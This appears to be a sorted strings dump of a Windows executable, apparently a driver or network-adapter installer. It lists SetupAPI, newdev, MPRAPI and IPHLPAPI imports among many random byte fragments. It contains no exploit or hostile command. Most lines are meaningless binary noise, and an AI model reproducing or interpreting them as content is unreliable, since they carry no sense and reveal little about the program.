]5Ayj>-
"`@5J@nn
5lB	|E
|5M/V3
(@@5N3(
~~~~~~~~6
6.-<2_
;#6:>8
$@@6-bX
+6EDGs
6F_7FJ
#6Heg14
6]hqeB
6[oF_@/+v4
777777
77777777
____77kkeeeee
7;GFW2
80E-hYj
888     
88888777
==888888888
88888888888
8.@@H5A<Xn
8*RSfe
.` }%[9
99^^^^
999999
 9D#Lfm
+*9Q,&<
*9sg`G
9t7g$f
' @`)A
a\1HnS
!"` A4
A4Wy3?S~
AAAAAAAAAAA
aaaaaaaaaaaaaaaaaaaaa
aaaaa^^EEEEEEAAA
aaRRRRRRRR
aOKm'VSA
A|\Q>|
a'wy7L
bbb+++++++++++
bbbbbbb
bbbbbbbbbbbbb
bbbbbbYYY
^b&BW;
b.+c1*
B&f~\k
b`O)y6j
``/bp:
BUN]xg
B:WxO"m
*C&7\O
:c~B"@
Cbo1!\
^^^^^^^^^^ccc
<<<<CCCCCCC
cccccccc44444
CCCCCCCC77777
ccccccccc
CCCCCCCCCCCxxxxxxx$$$$$$
|-cM&9
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
|/cO1-q
>( @cP
!'Cq64
CraEb3
CuFXF_
cUVuLI
cV&@`~
\}%cX8x
@.data
-------DD
$$$ddd
dddd44
dddddddddddddddd
DeleteFileW
dh*@`w
Dm0`x	iuv
DNX|!nbK.<
`dw/$`
_e6xea'
<+@E:9-
eeeeee
EEEEEE
<<<<eeeeeeeeee
eeeeKKKKKKKKKKK
*E#.#F
}{}\E`nI
EnumResourceNamesW
e;qZ@/0
*@ F @
f1h/^@5
f($%3;
FFFFFFFFFFFFF
fffffffffffffff
-fg_*  
f=<G.`
_+f"{h
FindClose
FindFirstFileW
FindNextFileW
)f_]nd4
fO#Gv9
|fpW:|
FreeLibrary
f^tSw)
,@ ~FX[
fxxM@+
g;C#.S
.@@gD<
GetAtomNameW
GetExitCodeProcess
GetIpAddrTable
GetModuleHandleW
GetPrivateProfileStringW
GetProcAddress
GetWindowsDirectoryW
]]]ggg
GGGGGGGG
gggggggggggggggggg
_gGVy8
GlobalAlloc
GlobalFree
G<McA.
GuNNNN..........
h'Ef02q
He%jb4l'_
"""""""hhhh
HHHHHH
hhhhhhh
:::HHHHHHHHHHHHH
HHHHHHHHHHHHHHHHH
~HkUwJ$`
H,lI'Y
" @hpL
"`@h^R<
h( @?V,
%HVnKG
[,@}I4l}(
!i9e[Ujn.@
IE|s((
%,IFeb-4
iiiiii
IIIIIIII
iiiiiiiii
IIIIIIIII
IIIIIIIIII
iiiiiiiiiiiiii
IPHLPAPI.DLL
?iRiAL
``-isNI>=\
iWdBA{
j/|!. 
 `@)j3@IH{i
j5Gyeh
@ ` j6
jDp( @
JDT_?2q7"d
j)gw	i
JJJJ[[[[[[[[[[[[[[<<<<<<<<CCCCC::::]
jL<z'P
j*QDBI
jt/[cQ
jw$``p
k7l&H9
KERNEL32.dll
KhL!MX9
K'HTJ&|
KKKKKK
KKKKKKKKK
kMMMMM%%%%CCCCC
kRz_.'N
k`XQ26
KZ>I7B
`L/*` 
LdOpgh
L'}fz^
LLLLLLL
lllllllss
LoadLibraryExW
lP1[Q|5
Lv0,  U
ly:+L\;
m8% @@t"
mB.=>s
>ME)#d
mmIIIIIOOOOhhh
mmmm;;;
MPRAPI.dll
MprConfigGetFriendlyName
MprConfigServerConnect
MprConfigServerDisconnect
MulDiv
MultiByteToWideChar
mxYsEjj
 `n$``
n``````
N3hQnF
=N6s{-}
NdrConformantArrayFree
newdev.dll
ngJUp('
NH G\{T
Nk5<[h
nn]]]]]]]]
NNNNNN
nnnnnnn
nnnnnnnn>
NNNNNNNN
NNNNNNNNNNNN
nrmq;W9
nuB8F<
nUZ~6_t
N%.,Z>>
` o @`
`[*  o>
''''''o
oaqQy]
OjJ$@@
ooooooo
 @ov84
 )]ow<
`P}8  
pbW-Jv
PCP3aX8
pF=Y+a
P[o^-!
]]]]]PPP
\PPPiiiiiii
#pppppp
ppppppp
//PPPPPPPPPPPPPPPPPPP
pQTn"6
!-{[pt
Pu3/M	
@`Q  @_
Q?????????????
Q11@C~
q5=.[`P
[QD>44
QG<*rMB
qI\'`F
QJ6sl2n
(Qk~J=X
q!kwO0
 qPJ+vCA
qqqlllllllll
qqqqq5
qqqqqqqiii
QQQQQQQQQQ
qqqqqqqqqqq
}qt-,@ 
&` qtl
#Q/U`"
qW KEy
(` q}z
&|	R2	%:a
R6RDs]
R&  |A
`.rdata
ReadFile
.reloc
RgbkY$
RPCRT4.dll
~rpXi>c
rrraaaaaaaaaaaaaaaaaaaaaaaaaaoooo
rrrrrr
RRRRRRRRRRR
rrsssssf
RsTR3m$k 
rWZ|8cW
S-e)K]0
SetFilePointer
SETUPAPI.dll
SetupCloseInfFile
SetupCopyOEMInfW
SetupDiBuildClassInfoList
SetupDiCallClassInstaller
SetupDiClassGuidsFromNameW
SetupDiClassNameFromGuidW
SetupDiCreateDeviceInfoA
SetupDiCreateDeviceInfoList
SetupDiDeleteDeviceInfo
SetupDiDestroyDeviceInfoList
SetupDiEnumDeviceInfo
SetupDiGetClassDescriptionW
SetupDiGetClassDevsA
SetupDiGetClassDevsW
SetupDiGetDeviceInstallParamsA
SetupDiGetDeviceInstanceIdW
SetupDiGetDeviceRegistryPropertyA
SetupDiGetDeviceRegistryPropertyW
SetupDiSetClassInstallParamsW
SetupDiSetDeviceRegistryPropertyW
SetupGetInfFileListA
SetupGetLineTextA
SetupOpenInfFileA
sI:h)E
SM	YDL
s'Q.gy
SSiiiii
ssssss
sssssssmmmmm
ssssssss9999
SSSSSSSSSS
SSSSSSSSSSSSS
----SSSSSSSSSSSSSSSSSZZZBBB
ssssssssszz
/sx\p*
, `Sys
~SzEM^b
t0J!ys
Tg1	z.`
!This program cannot be run in DOS mode.
^:T#szVo
	%TTO#
TTTTTT
...........TTTTTT
ttttttt
ttttttttt
TTTTTTTTT
tt&&&UUP
$t"U],D
^=u		'
 'U[ `
u0'QS7
u5>o%l
}U&6E/
,]Uh51L
U{iAj<
|[Um	MP
UpdateDriverForPlugAndPlayDevicesW
U	Q&? 
UuidCreate
UUUUUpppppp
uuuuuuuuuuuuuuu
\U<>Z?
v@@@@@
`V]4Se
V*={\b
&`@vE.`
V|j_9$
VJ\\+Y
vLWKIM
vmzbLw
;<+VP1Zk
v`%U(`
VV(((((
vvvvvvvv
VVVVVVVV
||||)))W
WaitCommEvent
WaitForSingleObject
 wBT2Qq
wgBWs?
WkCmrD"
}w-M=?4B
WriteFile
WritePrivateProfileStringW
WS\|{w
wt\TK2
WWWWWW
wwwwwwww
WWWWWWWWW
wwwwwwwwwww
WWWWWWWWWWWWWW
\ `@X?
x<3/}&y
-*x!dE
xLT7kDQ
XlZ"F"U
xM73Sc.?
Xoooooooo%
`x	rNUd
X&'s6P
,XXFgR8%Y
XXXXXX
####XXXXXXXXXXXXXXXXJJJ>>ddduuuuuu
XXXXXXXXXXXXXXXXX
xxxxxxxxxxxxxxxxxxxxxx
"x(	/y
X#:ylA
` ydh`
'\yE4@2
y>'G\_
 _~ymc?8
";yObJ
@@, `<yp
Y@r-PeB
+y}wY`
,y:	Yq
)yyyaaaabbbbbbb
YYYYyyy
` z4l9
Z5x?nJP
z%/"~A
'Z^'a[
|zc@h:
z	F.fe
Zfi<'I:+
z@_'i\
z*^N](
ZN70\s
-+~zo&
 z]q^1W'
zr-@75
`#@ztt
Z~v3>@
&ZY0(!
`!	Zyv!
ZZbbbbbbbb
                 zzz
ZZZ....
ZZZ****sssssssssssssssssssssssssssss
zzzzz```
ZZZZZ66
zzzzzL
ZZZZZZFFFF
zzzzzzzz